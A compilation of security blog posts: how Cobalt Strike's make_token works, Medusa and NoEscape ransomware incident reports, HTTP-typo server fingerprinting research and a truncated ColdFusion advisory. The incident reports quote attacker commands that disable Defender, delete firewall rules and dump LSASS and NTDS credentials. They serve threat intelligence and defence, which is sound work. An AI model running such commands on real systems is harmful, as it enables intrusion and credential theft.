Even though the description does not mention it, Raphael states that make_token requires an administrative context. However, if we go ahead and use the command with a non-privileged user… it works! What are we missing here?
This post aims to shed more light on how the make_token command works, as well as its capabilities and limitations. This information will be useful in situations where you want to impersonate other users through their credentials with the goal of enumerating or moving laterally to remote systems.
It’s important to note that, even though we are discussing Cobalt Strike, this knowledge is perfectly applicable to any modern C2 framework. In fact, for the purposes of this post, we took advantage of the fact that Meterpreter did not have a make_token module to implement it ourselves.
An example of the new post/windows/manage/make_token module can be seen below:
You can find more information about our implementation in the following links:
Let’s begin with some theory about Windows authentication. This will help in understanding how make_token works under the hood and addressing the questions raised in the introduction.
Local Security Context Network Security Context?
Let’s consider a scenario where our user is capsule.corp\yamcha and we want to interact with a remote system to which only capsule.corp\bulma has access. In this example, we have Bulma’s password, but the account is affected by a deny logon policy in our current system.
If we attempt to run a cmd.exe process with runas using Bulma’s credentials, the result will be something like this:
The netonly flag is intended for these scenarios. With this flag we can create a process where we remain Yamcha at the local level, while we become Bulma at the network level, allowing us to interact with the remote system.
In this example, Yamcha and Vegeta were users from the same domain and we could circumvent the deny log on policy by using the netonly flag. This flag is also very handy for situations where you have credentials belonging to a local user from a remote system, or to a domain user from an untrusted domain.
The fundamental thing to understand here is Windows will not validate the credentials you specify to runas /netonly, it will just make sure they are used when the process interacts with the network. That’s why we can bypass deny log on policies with runas /netonly, and also use credentials belonging to users outside our current system or from untrusted domains.
Now… How does runas manage to create a process where we are one identity in the local system, and another identity in the network?
If we extract the strings of the program, we will see the presence of CreateProcessWithLogonW.
A simple lookup of the function shows that runas is probably using it to create a new process with the credentials specified as arguments.
Reading the documentation, we will find a LOGON_NETCREDENTIALS_ONLY flag which allows the creation of processes in a similar way to what we saw with netonly. We can safely assume that this flag is the one used by runas when we specify /netonly.
The Win32 API provides another function very similar to CreateProcessWithLogonW, but without the process creation logic. This function is called LogonUserA.
LogonUserA is solely responsible for creating a new security context from given credentials. This is the function that make_token leverages and is commonly used along with the LOGON32_LOGON_NEW_CREDENTIALS logon type to create a netonly security context (we can see this in the implementations of open source C2 frameworks).
To understand how it is possible to create a process with two distinct “identities” (local/network), it is fundamental to become familiar with two important components of Windows authentication: logon sessions and access tokens.
Logon Sessions Access Tokens
When a user authenticates to a Windows system, a process similar to the image below occurs. At a high level, the user’s credentials are validated by the appropriate authentication package, typically Kerberos or NTLM. A new logon session is then created with a unique identifier, and the identifier along with information about the user is sent to the Local Security Authority (LSA) component. Finally, LSA uses this information to create an access token for the user.
Regarding access tokens, they are objects that represent the local security context of an account and are always associated with a process or thread of the system. These objects contain information about the user such as their security identifier, privileges, or the groups to which they belong. Windows performs access control decisions based on the information provided by access tokens and the rules configured in the discretionary access control list (DACL) of target objects.
An example is shown below where two processes – one from Attl4s and one from Wint3r – attempt to read the “passwords.txt” file. As can be seen, the Attl4s process is able to read the file due to the second rule (Attl4s is a member of Administrators), while the Wint3r process is denied access because of the first rule (Wint3r has identifier 1004).
Regarding logon sessions, their importance stems from the fact that if an authentication results in cached credentials, they will be associated with a logon session. The purpose of cached credentials is to enable Windows to provide a single sign-on (SSO) experience where the user does not need to re-enter their credentials when accessing a remote service, such as a shared folder on the network.
As an interesting note, when Mimikatz dumps credentials from Windows authentication packages (e.g., sekurlsa::logonpasswords), it iterates through all the logon sessions in the system to extract their information.
The following image illustrates the relationship between processes, tokens, logon sessions, and cached credentials:
The key takeaways are:
Access tokens represent the local security context of an authenticated user. The information in these objects is used by the local system to make access control decisions
Logon sessions with cached credentials represent the network security context of an authenticated user. These credentials are automatically and transparently used by Windows when the user wants to access remote services that support Windows authentication
What runas /netonly and make_token do under the hood is creating an access token similar to the one of the current user (Yamcha) along with a logon session containing the credentials of the alternate user (Bulma). This enables the dual identity behaviour where the local identity remains the same, while the network identity changes to that of the alternate user.
As stated before, the fact that runas netonly or make_token do not validate credentials has many benefits. For example we can use credentials for users who have been denied local access, and also for accounts that the local system does not know and cannot validate (e.g. a local user from other computer or an account from an untrusted domain). Additionally, we can create “sacrificial” logon sessions with invalid credentials, which allows us to manipulate Kerberos tickets without overwriting the ones stored in the original logon session.
However, this lack of validation can also result in unpleasant surprises, for example in the case of a company using an authenticated proxy. If we make a mistake when inserting credentials to make_token, or create sacrificial sessions carelessly, we can end up with locked accounts or losing our Beacon because it is no longer able to exit through the proxy!
Administrative Context or Not!?
Raphael mentioned that, in order to use a token created by make_token, an administrative context was needed.
“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”
Do we really need an administrative context? The truth is there are situations where this statement is not entirely accurate.
As far as we know, the make_token command uses the LogonUserA function (along with the LOGON32_LOGON_NEW_CREDENTIALS flag) to create a new access token similar to that of the user, but linked to a new logon session containing the alternate user’s credentials. The command does not stop there though, as LogonUserA only returns a handle to the new token; we have to do something with that token!
Let’s suppose our goal is to create new processes with the context of the new token.
Creating Processes with a Token
If we review the Windows API, we will spot two functions that support a token handle as an argument to create a new process:
Reading the documentation of these functions, however, will show the following statements:
“Typically, the process that calls the CreateProcessAsUser function must have the SE_INCREASE_QUOTA_NAME privilege and may require the SE_ASSIGNPRIMARYTOKEN_NAME privilege if the token is not assignable.”
“The process that calls CreateProcessWithTokenW must have the SE_IMPERSONATE_NAME privilege.”
This is where Raphael’s statement makes sense. Even if we can create a token with a non-privileged user through LogonUserA, we will not be able to use that token to create new processes. To do so, Microsoft indicates we need administrative privileges such as SE_ASSIGNPRIMARYTOKEN_NAME, SE_INCREASE_QUOTA_NAME or SE_IMPERSONATE_NAME.
When using make_token in a non-privileged context and attempting to create a process (e.g., shell dir \dc01.capsule.corp\C$), Beacon will silently fail and fall back to ignoring the token to create the process. That’s one of the reasons why sometimes it appears that the impersonation is not working properly.
As a note, agents like Meterpreter do give more information about the failure:
As such, we could rephrase Raphael’s statement as follows:
“The problem with make_token is it requires you to be in an administrator context before you can actually create processes with that token”
The perceptive reader may now wonder… What happens if I operate within my current process instead of creating new ones? Do I still need administrative privileges?
Access Tokens + Thread Impersonation
The Windows API provides functions like ImpersonateLoggedOnUser or SetThreadToken to allow a thread within a process to impersonate the security context provided by an access token.
In addition to keeping the token handle for future process creations, make_token also employs functions like these to acquire the token’s security context in the thread where Beacon is running. Do we need administrative privileges for this? Not at all.
As can be seen in the image below, we meet point number three:
This means that any command or tool executed from the thread where Beacon is running will benefit from the security context created by make_token, without requiring an administrative context. This includes many of the native commands, as well as capabilities implemented as Beacon Object Files (BOFs).
Closing Thoughts
Considering all the information above, we could do a more detailed description of make_token as follows:
The make_token command creates an access token similar to the one of the current user, along with a logon session containing the credentials specified as arguments. This enables a dual identity where nothing changes locally (we remain the same user), but in the network we will be represented by the credentials of the alternate user (note that make_token does not validate the credentials specified). Once the token is created, Beacon impersonates it to benefit from the new security context when running inline capabilities.
The token handle is also stored by Beacon to be used in new process creations, which requires an administrative context. If a process creation is attempted with an unprivileged user, Beacon will ignore the token and fall back to a regular process creation.
As a final note, we would like to point out that in 2019 Raphael Mudge released a new version of his awesome Red Team Ops with Cobalt Strike course. In the eighth video, make_token was once again discussed, but this time showing a demo with an unprivileged user. While this demonstrated that running the command did not require an administrative context, it did not explain much more about it.
We hope this article has answered any questions you may have had about make_token.
Unveiling the Dark Side: A Deep Dive into Active Ransomware Families
Author: Molly Dewis
Intro
Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.
In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa.
Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims.
Summary
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.
Below provides a summary of findings which are presented in this blog post:
Use of web shells to maintain access.
Utilising PowerShell to conduct malicious activity.
Dumping password hashes.
Disabling antivirus services.
Use of Windows utilises for discovery activities.
Reverse tunnel for C2.
Data exfiltration.
Deployment of Medusa ransomware.
Medusa
Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.
Incident Overview
Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.
Timeline
T – Initial Access gained via web shells.
T+13 days – Execution activity.
T+16 days – Persistence activity.
T+164 days – Defense Evasion activity.
T+172 days – Persistence and Discovery activity.
T+237 days – Defense Evasion and Credential Access Activity started.
T+271 days – Ransomware Executed.
Mitre TTPs
Initial Access
The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.
Execution
PowerShell was leveraged by the threat actor to conduct various malicious activity such as:
Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe
Conducting discovery activity
Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain
Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’.
Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.
A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI
Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.
Persistence
Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>.
Defence Evasion
Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.
Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\”.
The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.
The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities.
Credential Access
The following credential dumping techniques were utilised by the threat actor:
Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.
Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable.
An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll.
he built-in Windows tool ntdsutil.exe was used to extract the NTDS:
powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q
Discovery
The threat actor conducted the following discovery activity:
Type of discovery activity
Description
nltest /trusted_domains
Enumerates domain trusts
net group ‘domain admins’ /domain
Enumerates domain groups
net group ‘domain computers’ / domain
Enumerates domain controllers
ipconfig /all
Learn about network configuration and settings
tasklist
Displays a list of currently running processes on a computer
quser
Show currently logged on users
whoami
Establish which user they were running as
wmic os get name
Gathers the name of the operating system
wmic os get osarchitecture
Establishes the operating system architecture
Lateral Movement
Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network.
Command and Control
A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used.
Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.
Exfiltration
Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.
Impact
The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.
In August 2023, Meta engaged NCC Group’s Cryptography Services practice to perform an implementation review of their Auditable Key Directory (AKD) library, which provides an append-only directory of public keys mapped to user accounts and a framework for efficient cryptographic validation of this directory by an auditor. The library is being leveraged to provide an AKD for WhatsApp and is meant to serve as a reference implementation for auditors of the WhatsApp AKD, as well as to allow other similar services to implement key transparency. The review was performed remotely by 3 consultants over a two-week period with a total of 20 person-days spent. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed.
At Fox-IT (part of NCC Group) identifying servers that host nefarious activities is a critical aspect of our threat intelligence. One approach involves looking for anomalies in responses of HTTP servers.
Sometimes cybercriminals that host malicious servers employ tactics that involve mimicking the responses of legitimate software to evade detection. However, a common pitfall of these malicious actors are typos, which we use as unique fingerprints to identify such servers. For example, we have used a simple extraneous whitespace in HTTP responses as a fingerprint to identify servers that were hosting Cobalt Strike with high confidence1. In fact, we have created numerous fingerprints based on textual slipups in HTTP responses of malicious servers, highlighting how fingerprinting these servers can be a matter of a simple mistake.
HTTP servers are expected to follow the established RFC guidelines of HTTP, producing consistent HTTP responses in accordance with standardized protocols. HTTP responses that are not set up properly can have an impact on the safety and security of websites and web services. With these considerations in mind, we decided to research the possibility of identifying unknown malicious servers by proactively searching for textual errors in HTTP responses.
HTTP response headers and semantics
HTTP is a protocol that governs communication between web servers and clients2. Typically, a client, such as a web browser, sends a request to a server to achieve specific goals, such as requesting to view a webpage. The server receives and processes these requests, then sends back corresponding responses. The client subsequently interprets the message semantics of these responses, for example by rendering the HTML in an HTTP response (see example 1).
An HTTP response includes the status code and status line that provide information on how the server is responding, such as a ‘404 Page Not Found’ message. This status code is followed by response headers. Response headers are key:value pairs as described in the RFC that allow the server to give more information for context about the response and it can give information to the client on how to process the received data. Ensuring appropriate implementation of HTTP response headers plays a crucial role in preventing security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure, and many others3.
Methodology
The purpose of this research is to identify textual deviations in HTTP response headers and verify the servers behind them to detect new or unknown malicious servers. To accomplish this, we collected a large sample of HTTP responses and applied a spelling-checking model to flag any anomalous responses that contained deviations (see example 3 for an overview of the pipeline). These anomalous HTTP responses were further investigated to determine if they were originating from potentially malicious servers.
Data: Batch of HTTP responses
We sampled approximately 800,000 HTTP responses from public Censys scan data4. We also created a list of common HTTP response header fields, such as ‘Cache-Control’, ‘Expires’, ‘Content-Type’, and a list of typical server values, such as ‘Apache’, ‘Microsoft-IIS’, and ‘Nginx.’ We included a few common status codes like ‘200 OK,’ ensuring that the list contained commonly occurring words in HTTP responses to serve as our reference.
Metric: The Levenshtein distance
To measure typos, we used the Levenshtein distance, an intuitive spelling-checking model that measures the difference between two strings. The distance is calculated by counting the number of operations required to transform one string into the other. These operations can include insertions, deletions, and substitutions of characters. For example, when comparing the words ‘Cat’ and ‘Chat’ using the Levenshtein distance, we would observe that only one operation is needed to transform the word ‘Cat’ into ‘Chat’ (i.e., adding an ‘h’). Therefore, ‘Chat’ has a Levenshtein distance of one compared to ‘Cat’. However, comparing the words ‘Hats’ and ‘Cat’ would require two operations (i.e., changing ‘H’ to ‘C’ and adding an ‘s’ in the end), and therefore, ‘Hats’ would have a Levenshtein distance of two compared to ‘Cat.’
The Levenshtein distance can be made sensitive to capitalization and any character, allowing for the detection of unusual additional spaces or lowercase characters, for example. This measure can be useful for identifying small differences in text, such as those that may be introduced by typos or other anomalies in HTTP response headers. While HTTP header keys are case-insensitive by specification, our model has been adjusted to consider any character variation. Specifically, we have made the ‘Server’ header case-sensitive to catch all nuances of the server’s identity and possible anomalies.
Our model performs a comparative analysis between our predefined list (of commonly occurring HTTP response headers and server values) and the words in the HTTP responses. It is designed to return words that are nearly identical to those of the list but includes small deviations. For instance, it can detect slight deviations such as ‘Content-Tyle’ instead of the correct ‘Content-Type’.
Output: A list with anomalous HTTP responses
The model returned a list of two hundred anomalous HTTP responses from our batch of HTTP responses. We decided to check the frequency of these anomalies over the entire scan dataset, rather than the initial sample of 800.000 HTTP Responses. Our aim was to get more context regarding the prevalence of these spelling errors.
We found that some of these anomalies were relatively common among HTTP response headers. For example, we discovered more than eight thousand instances of the HTTP response header ‘Expired’ instead of ‘Expires.’ Additionally, we saw almost three thousand instances of server names that deviated from the typical naming convention of ‘Apache’ as can be seen in table 1.
Deviation
Common name
Amount
Server: Apache Coyote
Server: Apache-Coyote
2941
Server: Apache \r\n
Server: Apache
2952
Server: Apache.
Server: Apache
3047
Server: CloudFlare
Server: Cloudflare
6615
Expired:
Expires:
8260
Table 1: Frequency of deviations in HTTP responses online
Refining our research: Delving into the rarest anomalies
However, the rarest anomalies piqued our interest, as they could potentially indicate new or unknown malicious servers. We narrowed our investigation by only analyzing HTTP responses that appeared less than two hundred times in the wild and cross-referenced them with our own telemetry. By doing this, we could obtain more context from surrounding traffic to investigate potential nefarious activities. In the following section, we will focus on the most interesting typos that stood out and investigate them based on our telemetry.
Findings
Anomalous server values
During our investigation, we came across several HTTP responses that displayed deviations from the typical naming conventions of the values of the ‘Server’ header.
For instance, we encountered an HTTP response header where the ‘Server’ value was written differently than the typical ‘Microsoft-IIS’ servers. In this case, the header read ‘Microsoft -IIS’ instead of ‘Microsoft-IIS’ (again, note the space) as shown in example 3. We suspected that this deviation was an attempt to make it appear like a ‘Microsoft-IIS’ server response. However, our investigation revealed that a legitimate company was behind the server which did not immediately indicate any nefarious activity. Therefore, even though the typo in the server’s name was suspicious, it did not turn out to come from a malicious server.
The ‘ngengx’ server value appeared to intentionally mimic the common server name ‘nginx’ (see example 4). We found that it was linked to a cable setup account from an individual that subscribed to a big telecom and hosting provider in The Netherlands. This deviation from typical naming conventions was strange, but we could not find anything suspicious in this case.
Similarly, the ‘Apache64’ server value deviates from the standard ‘Apache’ server value (see example 5). We found that this HTTP response was associated with webservers of a game developer, and no apparent malevolent activities were detected.
While these deviations from standard naming conventions could potentially indicate an attempt to disguise a malicious server, it does not always indicate nefarious activity.
Anomalous response headers
Moreover, we encountered HTTP response headers that deviated from the standard naming conventions. The ‘Content-Tyle’ header deviated from the standard ‘Content-Type’ header, and we found both the correct and incorrect spellings within the HTTP response (see example 6). We discovered that these responses originated from ‘imgproxy,’ a service designed for image resizing. This service appears to be legitimate. Moreover, a review of the source code confirms that the ‘Content-Tyle’ header is indeed hardcoded in the landing page source code (see Example 7).
Similarly, the ‘CONTENT_LENGTH’ header deviated from the standard spelling of ‘Content-Length’ (see example 7). However, upon further investigation, we found that the server behind this response also belongs to a server associated with webservers of a game developer. Again, we did not detect any malicious activities associated with this deviation from typical naming conventions.
The findings of our research seem to reveal that even HTTP responses set up by legitimate companies include messy and incorrect response headers.
Concluding Insights
Our study was designed to uncover potentially malicious servers by proactively searching for spelling mistakes in HTTP response headers. HTTP servers are generally expected to adhere to the established RFC guidelines, producing consistent HTTP responses as dictated by the standard protocols. Sometimes cybercriminals hosting malicious servers attempt to evade detection by imitating standard responses of legitimate software. However, sometimes they slip up, leaving inadvertent typos, which can be used for fingerprinting purposes.
Our study reveals that typos in HTTP responses are not as rare as one might assume. Despite the crucial role that appropriate implementation of HTTP response headers plays in the security and safety of websites and web services, our research suggests that textual errors in HTTP responses are surprisingly widespread, even in the outputs of servers from legitimate organizations. Although these deviations from standard naming conventions could potentially indicate an attempt to disguise a malicious server, they do not always signify nefarious activity. The internet is simply too messy.
Our research concludes that typos alone are insufficient to identify malicious servers. Nevertheless, they retain potential as part of a broader detection framework. We propose advancing this research by combining the presence of typos with additional metrics. One approach involves establishing a baseline of common anomalous HTTP responses, and then flagging HTTP responses with new typos as they emerge.
Furthermore, more research could be conducted regarding the order of HTTP headers. If the header order in the output differs from what is expected from a particular software, in combination with (new) typos, it may signal an attempt to mimic that software.
Lastly, this strategy could be integrated with other modelling approaches, such as data science models in Security Operations Centers. For instance, monitoring servers that are not only new to the network but also exhibit spelling errors. By integrating these efforts, we strive to enhance our ability to detect emerging malicious servers.
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.
Below provides a summary of findings which are presented in this blog post:
Initial access gained via a publicly disclosed vulnerability in an externally facing server
Use of vulnerable drivers to disable security controls
Remote Desktop Protocol was used for Lateral Movement
Access persisted through tunnelling RDP over SSH
Exfiltration of data via Mega
Execution of ransomware via scheduled task
NoEscape
NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.
Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add on to further impact victims.
Incident Overview
NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.
The threat actor seemed opportunistic in nature, whose objective was monetary gain with a double extortion method of ransomware which included data exfiltration. However, they did appear low skilled due to a kitchen sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to enact the same job for the threat actor, which is quite a noisy approach often not observed by the more sophisticated threat actor.
A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider, however this was interrupted due to premature execution of the ransomware which encrypted files that were being exfiltrated.
Timeline
T – Initial Access gained via webshell
T+1 min – Initial recon and credential dumping activity
T+9 min – Secondary access method established via Plink
T+18 days – Second phase of credential dumping activity
T+33 days – Data Exfiltration
T+33 days – Ransomware Executed
Mitre TTPs
Initial Access
T1190 – Exploit Public-Facing Application
In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.
WebShell were uploaded to the victims Microsoft Exchange server and gave the threat actor an initial foothold on the network.
Execution
T1059.001 – Command and Scripting Interpreter: PowerShell
PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.
net localgroup administrators
cmd.exe /c net group \”REDACTED” /domain
cmd.exe /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
T1053.005 – Scheduled Task
As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.
Persistence
T1505.003 – Server Software Component: Web Shell
Web Shells provided the threat actor continued access to the estate through the initial access vector.
Privilege Escalation
T1078.002 – Valid Accounts: Domain Accounts
Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution
T1078.003 – Valid Accounts: Local Accounts
The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.
Defence Evasion
T1562.001 – Impair Defences: Disable or Modify Tools
The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.
File
Description
Gmer.exe
GMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR
aswArPot.sys
An Avast antivirus driver deployed by threat actors to disable antivirus solutions.
mhyprot2.sys
Genshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes.
Credential Access
T1003 – Credential Dumping
Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.
File
Description
CSDump.exe
Unknown dumping tool (no longer on disk)
Fgdump.exe
A tool for mass password auditing of the Windows systems by dumping credentials from LSASS
MemoryDumper.exe
Creates an encrypted memory dump from LSASS process to facilitate offline cracking of passwords hashes.
Discovery
T1087.001 – Account Discovery: Local Account
A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:
net localgroup administrators
net group “REDACTED” /domain
T1018 – Remote System Discovery
Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:
netdom query /d:REDACTEDPDC
Lateral Movement
T1021.001 – Remote Desktop Protocol
Valid domain credentials were obtained through dumping the LSASS process, these accounts were then used to laterally move across the environment via RDP.
Command and Control
T1572 – Protocol Tunnelling
Secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY link onto multiple hosts in the environment. A SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.
The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.
Exfiltration
T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
As has become common when data is exfiltrated from a victims estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.
Impact
T1486 – Data Encrypted for Impact
The encryptor targeted all files on the C:\ drive except those with the below extension:
The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited
Execution
Command and Scripting Interpreter: PowerShell
T1059.001
PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected
Execution
Command and Scripting Interpreter: Windows Command Shell
T1059.003
Native Windows commands were utilised during the discovery phase of the endpoint and victim estate
Execution
Scheduled Task
T1053.005
A scheduled task was utilised to execute the ransomware binary
Persistence
Server Software Component: Web Shell
T1505.003
Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities
Privilege Escalation
Valid Accounts: Domain Accounts
T1078.002
Credentials to domain accounts were obtained and utilised for lateral movement
Privilege Escalation
Valid Accounts: Local Accounts
T1078.003
A disabled local account was re-enabled by the threat actor and used.
Defence Evasion
Impair Defenses: Disable or Modify Tools
T1562.001
Tooling was deployed in an attempt to disable the deployed endpoint security controls
Credentials Access
Credential Dumping
T1003
Various different tools were deployed to dump credentials from LSASS
Discovery
Account Discovery: Local Account
T1087.001
‘net’ native Windows command was utilised to discovery users in the domain administrator group
Discovery
Remote System Discovery
T1018
‘netdom’ was utilised to discover the primary domain controller for the victims estate
Lateral Movement
Remote Desktop Protocol
T1021.001
The primary method of lateral movement was RDP
Command and Control
Protocol Tunnelling
T1572
PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells
Command and Control
Remote Access Software
T1219
Access was gained to the existing TeamViewer deployment and utilised for lateral movement
Exfiltration
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1048.002
MegaSync was utilised to exfiltrate data to the cloud storage solution Mega
Vendor: Adobe
Vendor URL: https://www.adobe.com/uk/products/coldfusion-family.html
Versions affected:
* Adobe ColdFusion 2023 Update 5 and earlier versions
* Adobe ColdFusion 2021 Update 11 and earlier versions
Systems Affected: All
Author: McCaulay Hudson ([email protected])
Advisory URL: https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
CVE Identifier: CVE-2023-44353
Risk: 5.3 Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Adobe ColdFusion allows software developers to rapidly build web
applications. Recently, a critical vulnerability was identified in the
handling of Web Distributed Data eXchange (WDDX) requests to ColdFusion
Markup (CFM) endpoints. Multiple patches were released by Adobe to
resolve the vulnerability, and each has been given its own CVE and Adobe
security update:
From patch diffing, it was observed that the patch uses a deny list
in the serialfilter.txt file to prevent specific packages
from being executed in the deserialization attack. However, multiple
packages were identified which did not exist in the deny list by
default. This could be leveraged to perform enumeration of the
ColdFusion server, or to set certain configuration values.
The vulnerabilities identified in this post were tested against
ColdFusion 2023 Update 3 (packaged with Java JRE 17.0.6) using a default
installation. No additional third-party libraries or dependencies were
used or required for these specific vulnerabilities identified.
Impact
The vulnerabilities identified allowed an unauthenticated remote
attacker to:
Obtain the ColdFusion service account NTLM password hash when the
service was not running as SYSTEM
Verify if a file exists on the underlying operating system of the
ColdFusion instance
Verify if a directory exists on the underlying operating system of
the ColdFusion instance
Set the Central Config Server (CCS) Cluster Name configuration in
the ccs.properties file
Set the Central Config Server (CCS) Environment configuration in the
ccs.properties file
Being able to determine if a directory exists on the ColdFusion
system remotely may aid attackers in further attacks against the system.
For example, an attacker could enumerate the valid user accounts on the
